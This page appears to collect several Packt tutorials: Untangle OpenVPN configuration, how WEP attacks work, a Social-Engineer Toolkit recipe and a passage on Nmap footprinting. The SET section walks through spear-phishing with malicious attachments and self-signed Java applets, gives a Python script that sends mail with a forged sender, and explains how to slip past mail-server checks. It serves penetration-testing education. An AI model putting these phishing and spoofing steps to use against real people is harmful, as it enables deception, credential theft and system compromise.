Untangle's OpenVPN allows you to create OpenVPN clients to give your employees who are out of the office the ability to remotely access your internal network resources via their PCs and/or smartphones. An OpenVPN client can also be imported to another Untangle server to provide a site-to-site connection. Each OpenVPN client has its own unique IP (from the address space range defined previously); thus, each OpenVPN client can only be used by one user. For multiple users, you'll have to create multiple clients, as using the same client for multiple users will result in client disconnection issues.

Creating a remote client

You can create remote access clients by clicking on the Add button located under OpenVPN Settings | Server | Remote Clients. A new window will open with the following settings:

Enabled: If this checkbox is checked, the client is allowed to connect to the OpenVPN server. If unchecked, the connection is not allowed.
Client Name: Give the client a unique name; this will help you identify it. Only alphanumeric characters are allowed.
Group: Specify the group the client will be a member of. Groups are used to apply similar settings to their members.
Type: Select Individual Client for remote access and Network for site-to-site VPN.

The following screenshot shows a remote access client created for JDoe:

After configuring the client settings, you'll need to press the Done button and then the OK or Apply button to save the client configuration. The new client will be available under the Remote Clients tab, as shown in the following screenshot:

Understanding remote client groups

Groups are used to group clients together and apply similar settings to the group members. By default, there will be a Default Group. Each group has the following settings:

Group Name: Give the group a suitable name that describes the group settings (for example, full tunneling clients) or the target clients (for example, remote access clients).
Full Tunnel: If checked, all the traffic from the remote clients will be sent to the OpenVPN server, which allows Untangle to filter traffic directed to the Internet.
If unchecked, the remote client runs in split tunnel mode, which means that traffic directed to local resources behind Untangle is sent through the VPN, while traffic directed to the Internet is sent via the machine's default gateway. You can't use Full Tunnel for site-to-site connections.
Push DNS: If checked, the remote OpenVPN client will use the DNS settings defined by the OpenVPN server. This is useful for resolving local names and services.
Push DNS server: If OpenVPN Server is selected, remote clients will use the OpenVPN server for DNS queries. If set to Custom, the DNS servers configured here will be used for DNS queries.
Push DNS Custom 1: If Push DNS server is set to Custom, the value configured here will be used as the primary DNS server for the remote client. If blank, no setting will be pushed to the remote client.
Push DNS Custom 2: If Push DNS server is set to Custom, the value configured here will be used as the secondary DNS server for the remote client. If blank, no setting will be pushed to the remote client.
Push DNS Domain: The configured value will be pushed to the remote clients to extend their domain search path during DNS resolution.

The following screenshot illustrates all these settings:

Defining the exported networks

Exported networks define the internal networks behind the OpenVPN server that the remote client can reach after a successful connection. Additional routes are added to the remote client's routing table stating that the exported networks (the main site's internal subnets) are reachable through the OpenVPN server. By default, each static non-WAN interface network will be listed in the Exported Networks list:

You can modify the default settings or create new entries. The Exported Networks settings are as follows:

Enabled: If checked, the defined network will be exported to the remote clients.
Export Name: Enter a suitable name for the exported network.
Network: This defines the exported network, which should be written in CIDR form.

These settings are illustrated in the following screenshot:

Using OpenVPN remote access clients

So far, we have been configuring the client settings, but we haven't yet created the actual package to be used on remote systems. We can get the remote client package by pressing the Download Client button located under OpenVPN Settings | Server | Remote Clients, which will start the process of building the OpenVPN client to be distributed:

There are three options for downloading the OpenVPN client. The first option is to download the client as a .exe file to be used with the Windows operating system. The second option is to download the client configuration files, which can be used with Apple and Linux operating systems. The third option is similar to the second one, except that the configuration file will be imported to another Untangle NGFW server, as used in site-to-site scenarios. The following screenshot illustrates this:

The configuration files include the following:

<Site_name>.ovpn
<Site_name>.conf
Keys/<Site_name>-<User_name>.crt
Keys/<Site_name>-<User_name>.key
Keys/<Site_name>-<User_name>-ca.crt

The certificate files are for client authentication, and the .ovpn and .conf files hold the defined connection settings (that is, the OpenVPN server IP, the port used, and the ciphers used).
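As a quick illustrative sketch, the following Python snippet pulls the basic connection parameters out of a downloaded .ovpn file. It assumes the standard OpenVPN configuration syntax (directives such as remote, port, proto, and cipher, with # or ; starting a comment), and the file name is just an example:

def read_ovpn_settings(path):
    """Extract a few common connection directives from an .ovpn file."""
    wanted = ("remote", "port", "proto", "cipher")
    settings = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line[0] in "#;":
                continue  # skip blank lines and comments
            key, _, value = line.partition(" ")
            if key in wanted:
                settings[key] = value
    return settings

if __name__ == "__main__":
    # Example file name; use the .ovpn file downloaded from your Untangle server.
    print(read_ovpn_settings("Untangle-1849.ovpn"))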
The following screenshot shows the .ovpn file for the site Untangle-1849:

As shown in the following screenshot, the created file (openvpn-JDoe-setup.exe) includes the client name, which helps you identify the different clients and simplifies the process of distributing each file to the right user:

Using an OpenVPN client with Windows OS

Using an OpenVPN client with the Windows operating system is very simple. To do this, perform the following steps:

Set up the OpenVPN client on the remote machine. The setup is easy; it's just a next, next, install, and finish setup. It is important to set up and run the application as an administrator in order to allow the client to write the VPN routes to the Windows routing table. You should run the client as an administrator every time you use it so that it can create the required routes.
Double-click on the OpenVPN icon on the Windows desktop. The application will run in the system tray.
Right-click on the application's system tray icon and select Connect. The client will start initiating the connection to the OpenVPN server, and a window with the connection status will appear, as shown in the following screenshot:

Once the VPN tunnel is initiated, a notification will appear from the client with the IP assigned to it, as shown in the following screenshot:

If the OpenVPN client is running in the taskbar with an established connection, the client will automatically reconnect to the OpenVPN server if the tunnel is dropped due to Windows going to sleep. By default, the OpenVPN client will not start at Windows login. We can change this and allow it to start without requiring administrative privileges by going to Control Panel | Administrative Tools | Services and changing the OpenVPN service's Startup Type to automatic. Then, in the start parameters field, put --connect <Site_name>.ovpn; you can find <Site_name>.ovpn under C:\Program Files\OpenVPN\config.

Using OpenVPN with non-Windows clients

The method to configure OpenVPN clients to work with Untangle is the same for all non-Windows clients. Simply download the .zip file provided by Untangle, which includes the configuration and certificate files, and place them into the application's configuration folder. The steps are as follows:

Download and install any of the following OpenVPN-compatible clients for your operating system:
For Mac OS X, Untangle, Inc. suggests using Tunnelblick, which is available at http://code.google.com/p/tunnelblick
For Linux, OpenVPN clients for different Linux distros can be found at https://openvpn.net/index.php/access-server/download-openvpn-as-sw.html
OpenVPN Connect for iOS is available at https://itunes.apple.com/us/app/openvpn-connect/id590379981?mt=8
OpenVPN for Android 4.0+ is available at https://play.google.com/store/apps/details?id=net.openvpn.openvpn

Log in to the Untangle NGFW server, download the .zip client configuration file, and extract the files from it. Place the configuration files into any of the following OpenVPN-compatible applications:
Tunnelblick: Manually copy the files into the Configurations folder located at ~/Library/Application Support/Tunnelblick.
Linux: Copy the extracted files into /etc/openvpn; you can then connect using sudo openvpn /etc/openvpn/<Site_name>.conf.
iOS: Open iTunes and select the files from the config ZIP file to add to the app on your iPhone or iPad.
Android: From the OpenVPN for Android application, open the list of VPN profiles.
In the top-right corner, click on the folder icon, browse to the folder containing the OpenVPN .conf file, click on the file, and hit Select. Then, in the top-right corner, hit the little floppy disc icon to save the import. You should now see the imported profile; click on it to connect to the tunnel. For more information on this, visit http://forums.untangle.com/openvpn/30472-openvpn-android-4-0-a.html.

Run the OpenVPN-compatible client.

Using OpenVPN for site-to-site connection

To use OpenVPN for a site-to-site connection, one Untangle NGFW server runs in the OpenVPN server mode and the other server runs in the client mode. We will need to create a client that will be imported into the remote server. The client settings are shown in the following screenshot:

We will need to download the client configuration intended for import on another Untangle server (the third option on the client download menu) and then import this zipped client configuration on the remote server. To import the client, on the remote server under the Client tab, browse to the .zip file and press the Submit button. The client will be shown as follows:

You'll need to restart the two servers before you can use the OpenVPN site-to-site connection. The site-to-site connection is bidirectional.

Reviewing the connection details

The currently connected clients (whether OS clients or other Untangle NGFW servers) will appear under Connected Remote Clients, located under the Status tab. The screen shows the client name, its external address, and the address assigned to it by OpenVPN, in addition to the connection start time and the amount of data transmitted and received (in MB) during the connection:

For the site-to-site connection, the client server will show the name of the remote server and whether the connection is established or not, in addition to the amount of transmitted and received data in MB:

Event logs show a detailed connection history, as shown in the following screenshot:

In addition, there are two reports available for Untangle's OpenVPN:

Bandwidth usage: This report shows the maximum and average data transfer rates (KB/s) and the total amount of data transferred that day
Top users: This report shows the top users connected to the Untangle OpenVPN server

Troubleshooting Untangle's OpenVPN

In this section, we will discuss some points to consider when dealing with Untangle NGFW OpenVPN. OpenVPN acts as a router, as it routes between different networks. Using OpenVPN with Untangle NGFW in bridge mode (with the Untangle NGFW server behind another router) requires additional configuration:

Create a static route on the router that routes any traffic from the VPN range (the VPN address pool) to the Untangle NGFW server.
Create a port forward rule for the OpenVPN port 1194 (UDP) on the router to Untangle NGFW.
Verify that your setting under Config | Administration | Public Address is correct, as it is used by Untangle to configure OpenVPN clients, and ensure that the configured address is resolvable from outside the company.

If the OpenVPN client is connected but you can't access anything, perform the following steps:

Verify that the hosts you are trying to reach are listed in Exported Networks.
Try to ping the Untangle NGFW LAN IP address (if exported).
Try to bring up the Untangle NGFW GUI by entering the IP address in a browser.

If the preceding tasks work, your tunnel is up and operational.
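If you want to script these quick checks from a client machine, a minimal Python sketch along these lines can help. The address is an example for the lab in this article, and the ping flags assume a Linux client:

import subprocess
import urllib.request

def ping(host):
    """Return True if a single ICMP echo succeeds (Linux-style ping flags)."""
    result = subprocess.run(["ping", "-c", "1", "-W", "2", host],
                            capture_output=True)
    return result.returncode == 0

def gui_reachable(url):
    """Return True if the Untangle GUI answers over HTTP."""
    try:
        urllib.request.urlopen(url, timeout=5)
        return True
    except Exception:
        return False

if __name__ == "__main__":
    lan_ip = "172.16.1.1"  # example: Untangle NGFW LAN IP (must be exported)
    print("LAN IP pingable:", ping(lan_ip))
    print("GUI reachable:", gui_reachable("http://" + lan_ip))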
If you can't reach any clients inside the network, check for the following conditions:

The client machine's firewall is not preventing the connection from the OpenVPN client.
The client machine uses Untangle as a gateway or has a static route that sends the VPN address pool to Untangle NGFW.

In addition, some port forwarding rules on Untangle NGFW are needed for OpenVPN to function properly. The required ports are 53, 445, 389, 88, 135, and 1025. If the site-to-site tunnel is set up correctly but the two sites can't talk to each other, the reasons may be as follows:

If your sites have IPs from the same subnet (which typically happens when you use a service from the same ISP for both branches), OpenVPN may fail, as it considers that no routing is needed between IPs in the same subnet; you should ask your ISP to change the IPs.
To get DNS resolution to work over the site-to-site tunnel, you'll need to go to Config | Network | Advanced | DNS Server | Local DNS Servers and add the IP of the DNS server on the far side of the tunnel. Enter the domain in the Domain List column and use the FQDN when accessing resources. You'll need to do this on both sides of the tunnel for it to work from either side.
If you are using site-to-site VPN in addition to client-to-site VPN, and the OpenVPN clients are only able to connect to the main site, you'll need to add the VPN address pool to Exported Hosts and Networks.

Lab-based training

This section provides training for the OpenVPN site-to-site and client-to-site scenarios. In this lab, we will mainly use Untangle-01, Untangle-03, and a laptop (192.168.1.7). The ABC bank has started a project with Acme schools. As a part of this project, the ABC bank team needs to periodically access files located on Acme-FS01, so the two parties decided to opt for OpenVPN. However, Acme's network team doesn't want to leave access wide open for ABC bank members, so they set firewall rules limiting ABC bank's access to the file server only. In addition, the IT team director wants to have VPN access from home to the Acme network, which they decided to accomplish using OpenVPN. The following diagram shows the environment used in the site-to-site scenario:

To create the site-to-site connection, we need to perform the following steps:

Enable the OpenVPN server on Untangle-01.
Create a network-type client with a remote network of 172.16.1.0/24.
Download the client and import it under the Client tab on Untangle-03.
Restart the two servers.

After the restart, you have a site-to-site VPN connection. However, the Acme network is wide open to the ABC bank, so we need to create a limiting firewall rule. On Untangle-03, create a rule that allows any traffic that comes from the OpenVPN interface with the source 172.16.136.10 (the Untangle-01 client IP) and the destination 172.16.1.7 (Acme-FS01). The rule is shown in the following screenshot:

We will also need a general block rule that comes after the preceding rule in the rule evaluation order. The environment used for the client-to-site connection is shown in the following diagram:

To create a client-to-site VPN connection, we need to perform the following steps:

Enable the OpenVPN server on Untangle-03.
Create an individual-client-type client on Untangle-03.
Distribute the client to the intended user (that is, 192.168.1.7).
Install OpenVPN on your laptop.
Connect using the installed OpenVPN client and try to ping Acme-DC01 using its name.

The ping will fail because the client is not able to query the Acme DNS.
So, in the Default Group settings, change Push DNS Domain to Acme.local. Changing the group settings will not affect the OpenVPN client till the client is restarted. Now, the ping will succeed.

Summary

In this article, we covered the VPN services provided by Untangle NGFW and went deep into understanding how each solution works. This article also provided a guide on how to configure and deploy the services. Untangle provides a free solution that is based on the well-known open source OpenVPN, which provides an SSL-based VPN.

Resources for Article:

Further resources on this subject:

Important Features of Gitolite [Article]
Target Exploitation [Article]
IPv6 on Packet Tracer [Article]

What we can learn from attacks on the WEP Protocol

Packt
12 Aug 2015
4 min read
Over the past years, many types of attacks on the WEP protocol have been undertaken. Succeeding with such an attack is an important milestone for anyone who wants to undertake penetration tests of wireless networks. In this article by Marco Alamanni, the author of Kali Linux Wireless Penetration Testing Essentials, we will take a look at the basics of the WEP protocol and the most common types of attacks against it.

What is the WEP protocol?

The WEP protocol was introduced with the original 802.11 standard as a means to provide authentication and encryption to wireless LAN implementations. It is based on the Rivest Cipher 4 (RC4) stream cipher with a Pre-shared Secret Key (PSK) of 40 or 104 bits, depending on the implementation. A 24-bit pseudorandom Initialization Vector (IV) is concatenated with the pre-shared key to generate the per-packet keystream used by RC4 for the actual encryption and decryption process. Thus, the resulting per-packet key is 64 or 128 bits long. In the encryption phase, the keystream is XORed with the plaintext data to obtain the encrypted data, while in the decryption phase, the encrypted data is XORed with the keystream to recover the plaintext data. The encryption process is shown in the following diagram:

Attacks against WEP and why they occur

WEP is an insecure protocol and has been deprecated by the Wi-Fi Alliance. It suffers from various vulnerabilities related to the generation of the keystreams, the use of IVs (initialization vectors), and the length of the keys. The IV is used to add randomness to the keystream, trying to avoid the reuse of the same keystream to encrypt different packets. This purpose was not accomplished in the design of WEP, because the IV is only 24 bits long (with 2^24 = 16,777,216 possible values) and is transmitted in clear text within each frame. Thus, after a certain period of time (depending on the network traffic), the same IV, and consequently the same keystream, will be reused, allowing the attacker to collect the relative ciphertexts and perform statistical attacks to recover plaintexts and the key.

FMS attacks on WEP

The first well-known attack against WEP was the Fluhrer, Mantin, and Shamir (FMS) attack, back in 2001. The FMS attack relies on the way WEP generates the keystreams and on the fact that it also uses weak IVs to generate weak keystreams, making it possible for an attacker to collect a sufficient number of packets encrypted with these keys, analyze them, and recover the key. The number of IVs to be collected to complete the FMS attack is about 250,000 for 40-bit keys and 1,500,000 for 104-bit keys. The FMS attack was later enhanced by KoreK, improving its performance. Andreas Klein then found more correlations between the RC4 keystream and the key than the ones discovered by Fluhrer, Mantin, and Shamir, which can also be used to crack the WEP key.

PTW attacks on WEP

In 2007, Pyshkin, Tews, and Weinmann (PTW) extended Andreas Klein's research and improved the FMS attack, significantly reducing the number of IVs needed to successfully recover the WEP key. Indeed, the PTW attack does not rely on weak IVs as the FMS attack does, and it is very fast and effective. It is able to recover a 104-bit WEP key with a success probability of 50% using fewer than 40,000 frames, and with a probability of 95% using 85,000 frames. The PTW attack is the default method used by Aircrack-ng to crack WEP keys.
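To make the per-packet keystream construction concrete, here is a small Python sketch of WEP-style encryption: a textbook RC4 implementation seeded with IV || PSK, with the plaintext XORed against the generated keystream. It is for illustration only; it omits the CRC-32 integrity value that real WEP appends, and the IV/key values are made up:

def rc4(seed, length):
    """Textbook RC4: KSA then PRGA, returning 'length' keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # Key Scheduling Algorithm
        j = (j + S[i] + seed[i % len(seed)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = [], 0, 0
    for _ in range(length):                   # Pseudo-Random Generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def wep_encrypt(iv, key, plaintext):
    """One packet: keystream = RC4(IV || PSK), ciphertext = plaintext XOR keystream."""
    keystream = rc4(iv + key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))

if __name__ == "__main__":
    iv = b"\x01\x02\x03"            # 24-bit IV, sent in clear with the frame
    psk = b"\xaa\xbb\xcc\xdd\xee"   # example 40-bit pre-shared key
    ct = wep_encrypt(iv, psk, b"hello")
    print(ct.hex())
    # Decryption is the same XOR with the same keystream:
    print(wep_encrypt(iv, psk, ct))  # b'hello'

Because the 24-bit IV is transmitted in the clear, an attacker who sees two frames with the same IV knows they were encrypted with the same keystream, which is exactly what the statistical attacks described above exploit.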
ARP Request replay attacks on WEP Both FMS and PTW attacks need to collect quite a large number of frames to succeed and can be conducted passively, sniffing the wireless traffic on the same channel of the target AP and capturing frames. The problem is that, in normal conditions, we will have to spend quite a long time to passively collect all the necessary packets for the attacks, especially with the FMS attack. To accelerate the process, the idea is to reinject frames in the network to generate traffic in response so that we can collect the necessary IVs more quickly. A type of frame that is suitable for this purpose is the ARP request because the AP broadcasts it, each time with a new IV. As we are not associated with the AP, if we send frames to it directly, they are discarded and a de-authentication frame is sent. Instead, we can capture ARP requests from associated clients and retransmit them to the AP. This technique is called the ARP Request Replay attack and is also adopted by Aircrack-ng for the implementation of the PTW attack. Find out more to become a master penetration tester by reading Kali Linux Wireless Penetration Testing Essentials

Social-Engineer Toolkit

Packt
25 Oct 2013
11 min read
(For more resources related to this topic, see here.)

Social engineering is the act of manipulating people into performing actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or to some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintended malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked into revealing his/her login information through a fake login/phishing page. The Social-Engineer Toolkit (SET) is designed to perform such tricking activities. Just as we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans, designed to break through their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering.

Getting started with the Social-Engineer Toolkit (SET)

Let's start our introductory recipe about SET, where we will discuss SET on different platforms.

Getting ready

SET can be downloaded for different platforms from its official website, https://www.trustedsec.com/. It has both a GUI version, which runs through the browser, and a command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article.

How to do it...

To launch SET on BackTrack, start the terminal window and enter the following commands:

root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set

Copyright 2012, The Social-Engineer Toolkit (SET)
All rights reserved.

Select from the menu:

If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use. The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit.

How it works...

SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools such as SET. Python also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET; Apache is typically considered the preferred server while working with SET.

There's more...

Sometimes, you may have an issue upgrading to a new release of SET in BackTrack 5 R3. Try out the following steps:

Remove the old SET using the following command:

dpkg -r set

We can remove SET in two ways. First, we can change to the /pentest/exploits/set directory, make sure we are inside it, and then use the rm command to remove all the files present there. Alternatively, we can use the dpkg method shown previously.
Then, for reinstallation, we can download a clone of SET using the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit set/

Working with the SET config file

In this recipe, we will take a close look at the SET config file, which contains the default values for the different parameters used by the toolkit. The default configuration works fine with most attacks, but there can be situations where you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file.

Getting ready

To launch the config file, move to the config directory and open the set_config file:

root@bt:/pentest/exploits/set# nano config/set_config

The configuration file will be launched with some introductory statements, as shown in the following screenshot:

How to do it...

Let's go through it step by step. First, we will see what configuration settings are available for us:

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework:

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

Ettercap is a multipurpose sniffer for switched LANs. The Ettercap section can be used to perform LAN attacks such as DNS poisoning and spoofing. The preceding SET settings can be used to turn Ettercap ON or OFF, depending on usability.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF

The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF. The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, which can then be used to perform a browser-based Java applet infection attack:

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

We will discuss attack vectors in detail in a later recipe, that is, the spear-phishing attack vector. This attack vector will also require the JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail:

SELF_SIGNED_APPLET=ON

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is used by SET to auto-discover the network settings. It enables SET to detect your IP address if you are using NAT/port forwarding, and it allows you to connect to the external Internet. The following setting is used to set up the Apache web server for web-based attack vectors.
It is always preferred to set it to ON for better attack performance:

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET, so it is recommended to keep this flag OFF:

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF

The following setting can be used to build a self-signed certificate for web attacks, but the browser will show a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user:

# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF

The following setting is used to enable or disable the Metasploit listener once the attack is executed:

# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
AUTOMATIC_LISTENER=ON

The following configuration will allow you to use SET as a standalone toolkit without the Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase penetration testing performance:

# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
# OR THE OTHER ATTACK VECTORS.
METASPLOIT_MODE=ON

These are a few of the important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over SET.

How it works...

The SET config file is the heart of the toolkit, as it contains the default values that SET will pick up while performing various attack vectors. A misconfigured SET file can lead to errors during operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file.

Working with the spear-phishing attack vector

A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, it can be installed with the following command:

root@bt:~# apt-get install sendmail
Reading package lists... Done

Getting ready

Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works. In order to mitigate these types of attacks, recipient e-mail servers deploy gray-listing, SPF record validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <richyrich@gmail.com>, arrives from the IP 202.145.34.23, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list.
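As a practical aside, this kind of RBL check can be scripted. The following is a minimal sketch (not part of SET; zen.spamhaus.org is used here only as an example blacklist) that reverses the IP's octets and performs a DNS lookup against the list; any answer means the IP is listed:

import socket

def is_blacklisted(ip, dnsbl="zen.spamhaus.org"):
    # Reverse the octets: 202.145.34.23 becomes 23.34.145.202
    reversed_ip = ".".join(reversed(ip.split(".")))
    try:
        # Any A record returned by the list means the IP is listed
        socket.gethostbyname("%s.%s" % (reversed_ip, dnsbl))
        return True
    except socket.gaierror:
        return False

print(is_blacklisted("202.145.34.23"))

A sending server whose IP fails such a check is likely to see its messages rejected or flagged before they ever reach the target's mailbox.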
As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and ensure that the content looks as legitimate as possible. Spear-phishing attacks are of two types: web-based content and payload-based content.

How to do it...

The spear-phishing module has three different attack vectors at our disposal, so let's analyze each of them. Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options include setting up a VNC server, executing the payload and starting a command line, and so on. The next few steps are starting the sendmail server, setting a template for the malicious file format, and selecting a single or mass-mail attack.

Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

set:phishing>1
set:phishing> From address (ex: moo@example.com):bigmoney@gmail.com
set:phishing> Flag this message/s as high priority? [yes|no]:y

Setting up your own server may not be very reliable, as most mail services follow a reverse lookup to make sure that the e-mail was generated from the same domain name as the address name. Let's analyze another attack vector of spear-phishing. Creating a file format payload is another attack vector, in which we generate a malicious file built around a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as it is difficult to detect whether such documents are malicious, so they can be sent as attachments via e-mail:

set:phishing> Setup a listener [yes|no]:y
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin, and we will wait for the user to open the malicious file and connect back to the attacking system. The success of e-mail attacks depends on the e-mail client that we are targeting, so a proper analysis of this attack vector is essential.

How it works...

As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail contains a malicious attachment, which exploits a known vulnerability on the target machine and provides shell connectivity to the attacker. SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
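To make the mechanics of the spoofed mail concrete, here is a minimal sketch, separate from SET itself, that hands a message with a forged From header to a local sendmail/SMTP relay using Python's smtplib (the addresses are illustrative):

import smtplib
from email.mime.text import MIMEText

msg = MIMEText("Please review the attached report.")
msg["Subject"] = "Quarterly report"
msg["From"] = "bigmoney@gmail.com"      # forged sender, as in the recipe
msg["To"] = "victim@example.com"        # illustrative recipient

server = smtplib.SMTP("localhost", 25)  # assumes a local sendmail relay
server.sendmail(msg["From"], [msg["To"]], msg.as_string())
server.quit()

This is exactly the kind of message that the reverse lookup and RBL checks described in the Getting ready section are designed to catch.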

Information Gathering and Vulnerability Assessment

Packt
08 Nov 2016
7 min read
In this article by Wolf Halton and Bo Weaver, the authors of the book Kali Linux 2: Windows Penetration Testing, we try to debunk the myth that all Windows systems are easy to exploit. This is not entirely true. Almost any Windows system can be hardened to the point that it takes too long to exploit its vulnerabilities. In this article, you will learn the following:

How to footprint your Windows network and discover the vulnerabilities before the bad guys do
Ways to investigate and map your Windows network to find the Windows systems that are susceptible to exploits

(For more resources related to this topic, see here.)

In some cases, this will be adding to your knowledge of the top 10 security tools, and in others, we will show you entirely new tools to handle this category of investigation.

Footprinting the network

You can't find your way without a good map. In this article, we are going to learn how to gather network information and assess the vulnerabilities on the network. In the hacker world, this is called footprinting. It is the first step to any righteous hack, and it is where you will save yourself time and massive headaches. Without footprinting your targets, you are just shooting in the dark. The biggest tool in any good pen tester's toolbox is mindset. You have to have the mind of a sniper: you learn your target's habits and actions, you learn the traffic flows on the network where your target lives, you find the weaknesses in your target, and then you attack those weaknesses. Search and destroy!

In order to do good footprinting, you have to use several tools that come with Kali. Each tool has its strong points and looks at the target from a different angle. The more views you have of your target, the better your plan of attack. Footprinting will differ depending on whether your targets are external on the public network, or internal and on a LAN. We will be covering both aspects. Please read the paragraph above again, and remember that you do not have our permission to attack these machines. Don't do the crime if you can't do the time.

Exploring the network with Nmap

You can't talk about networking without talking about Nmap. Nmap is the Swiss Army knife for network administrators. It is not only a great footprinting tool, but also the best and cheapest network analysis tool any sysadmin can get. It is a great tool for checking a single server to make sure the ports are operating properly. It can heartbeat and ping an entire network segment. It can even discover machines when ICMP (ping) has been turned off. It can be used to pressure-test services: if the machine freezes under the load, it needs repairs.

Nmap was created in 1997 by Gordon Lyon, who goes by the handle Fyodor on the Internet. Fyodor still maintains Nmap, and it can be downloaded from http://insecure.org. You can also order his book Nmap Network Scanning on that website. It is a great book, well worth the price! Fyodor and the Nmap hackers have collected a great deal of information and security e-mail lists on their site. Since you have Kali Linux, you have a full copy of Nmap already installed!

Here is an example of Nmap running against a Kali Linux instance. Open the terminal from the icon on the top bar or by clicking on the menu link Applications | Accessories | Terminal. You could also choose the Root Terminal if you want, but since you are already logged in as root, you will not see any differences in how the terminal emulator behaves.
Type nmap -A 10.0.0.4 at the command prompt (you need to put in the IP of the machine you are testing). The output shows the open ports among 1000 commonly used ports. Kali Linux, by default, has no running network services, and so in this run you will see a readout showing no open ports. To make it a little more interesting, start the built-in web server by typing /etc/init.d/apache2 start. With the web server started, run the Nmap command again:

nmap -A 10.0.0.4

